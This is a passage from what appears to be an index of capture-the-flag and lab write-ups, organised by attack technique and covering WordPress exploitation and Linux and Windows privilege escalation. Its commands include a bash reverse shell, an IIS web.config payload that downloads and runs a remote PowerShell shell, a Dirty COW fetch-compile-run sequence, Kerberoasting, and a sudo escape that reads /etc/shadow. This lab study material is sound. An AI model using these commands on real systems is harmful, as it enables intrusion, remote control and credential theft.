| 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
[+] https://www.exploit-db.com/exploits/45274
---
<a name="exploit_wordpress_plugin_hellodolly"></a>
#### exploit_wordpress_plugin_hellodolly [⇡](#exploit)
wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
| 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="exploit_wordpress_template"></a>
#### exploit_wordpress_template [⇡](#exploit)
edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="privesc"></a>
### ⚙️ PrivEsc [🡑](#ttps)
<a name="privesc_anansi"></a>
#### privesc_anansi [⇡](#privesc)
the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell
```shell
sudo /home/anansi/bin/anansi_util manual cat /etc/shadow
- (press RETURN) !/bin/bash
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
---
<a name="privesc_bash_reverseshell"></a>
#### privesc_bash_reverseshell [⇡](#privesc)
bash reverse shell command
```shell
bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
[+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
[+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
---
<a name="privesc_bof"></a>
#### privesc_bof [⇡](#privesc)
craft exploit for the buffer overflow vulnerability to gain elevated privileges
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) |
---
<a name="privesc_chkrootkit"></a>
#### privesc_chkrootkit [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
---
<a name="privesc_credsreuse"></a>
#### privesc_credsreuse [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
---
<a name="privesc_cron"></a>
#### privesc_cron [⇡](#privesc)
leverage cronjobs to modify and execute `root` owned files
```shell
crontab -l
cat /etc/crontab
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) |
| 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) |
| 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
| 4. | [Billy Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf) | [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png" width="100" height="100" /> | [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="privesc_cron_rootjobs"></a>
#### privesc_cron_rootjobs [⇡](#privesc)
it would be useful to find `root` owned cronjob processes
```shell
pspy # find root owned processes, cronjobs
find / -type f -mmin -60 -ls 2>/dev/null # look for recently modified files since a user may not be able to see cron jobs by root
./CheckcronJob.sh # find background processes
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) |
[+] https://www.reddit.com/r/oscp/comments/gb4k83/htb_bashed_and_my_learnings_oscp_journey/
---
<a name="privesc_ctf_usertxt_timestamp"></a>
#### privesc_ctf_usertxt_timestamp [⇡](#privesc)
a neat trick for ctf boxes is to use `user.txt` file time as a reference to search for recently modified files
```shell
ls -lh /home/<username>/user.txt
```
[+] https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959/19
---
<a name="privesc_dirtycow"></a>
#### privesc_dirtycow [⇡](#privesc)
race condition that allows breakage of private read-only memory mappings
```shell
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
gcc -pthread -o dc dc.c -lcrypt
./dc
```
[+] https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
---
<a name="privesc_docker_group"></a>
#### privesc_docker_group [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) |
---
<a name="privesc_env_relative_path"></a>
#### privesc_env_relative_path [⇡](#privesc)
certain files when referenced without their complete path, can be misused to gain elevated privileges. this can be done by modifying the environment path to find the referenced file within a directory under attacker's control and placing a malicious binary within that directory with the same name as the referenced file
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) |
[+] https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/
---
<a name="privesc_freebsd"></a>
#### privesc_freebsd [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) |
---
<a name="privesc_iis_webconfig"></a>
#### privesc_iis_webconfig [⇡](#privesc)
on iis servers, the web.config file stores configuration data for web applications (similar to .htaccess on apacher server). it can contain asp code which will be executed by the web server. use the powershell reverse shell from [nishang framework](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to get a call back from uploaded web.config file
```shell
sample web.config:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('<attackerip>/Invoke-PowerShellTcp.ps1')")
%>
```
[+] https://0xdf.gitlab.io/2018/10/27/htb-bounty.html
---
<a name="privesc_kerberos_kerberosting"></a>
#### privesc_kerberos_kerberosting [⇡](#privesc)
allows us to extract administrator tickets and crack those to obtain administrator password
```shell
# add entry for target system within /etc/hosts
GetUserSPNs.py -request active.htb/SVC_TGS -outputfile ./adminticket
john --format=krb5tgs --wordlist /usr/share/wordlists/rockyou.txt ./adminticket # does not work on john v1.8.0.6-jumbo-1-bleeding
psexec.py administrator@active.htb
```
[+] https://0xrick.github.io/hack-the-box/active/
[+] https://room362.com/post/2016/kerberoast-pt1/
[+] https://room362.com/post/2016/kerberoast-pt2/
[+] https://room362.com/post/2016/kerberoast-pt3/
---
<a name="privesc_kernel_ipappend"></a>
#### privesc_kernel_ipappend [⇡](#privesc)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5/4.8 / Fedora Core 4/5/6 x86)
```shell
gcc -m32 -o exploit 9542.c -Wl,--hash-style=both
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) |
[+] https://www.exploit-db.com/exploits/9542
[+] https://nvd.nist.gov/vuln/detail/CVE-2009-2698
---
<a name="privesc_kernel_overlayfs"></a>
#### privesc_kernel_overlayfs [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
---
<a name="privesc_lxc_bash"></a>
#### privesc_lxc_bash [⇡](#privesc)
```shell
check output of id command
if user is member of lxd group, follow https://reboare.github.io/lxd/lxd-escape.html
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) |
---
<a name="privesc_modssl"></a>
#### privesc_modssl [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100" /> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) |
---
<a name="privesc_mysql_creds"></a>
#### privesc_mysql_creds [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
| 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) |
| 3. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
---
<a name="privesc_mysql_root"></a>
#### privesc_mysql_root [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
---
<a name="privesc_mysql_udf"></a>
#### privesc_mysql_udf [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
| 2. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) |
---
<a name="privesc_nfs_norootsquash"></a>
#### privesc_nfs_norootsquash [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) |
---
<a name="privesc_nmap"></a>
#### privesc_nmap [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100" /> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 2. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
---
<a name="privesc_passwd_writable"></a>
#### privesc_passwd_writable [⇡](#privesc)
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) |
---
<a name="privesc_psexec_login"></a>
#### privesc_psexec_login [⇡](#privesc)
If credentials for an administrative user are available, we can use `psexec.py` to connect and gain elevated access to the target system.
```shell
psexec <username>@<targetip>
```
| # | Name | Infra | Killchain | TTPs |
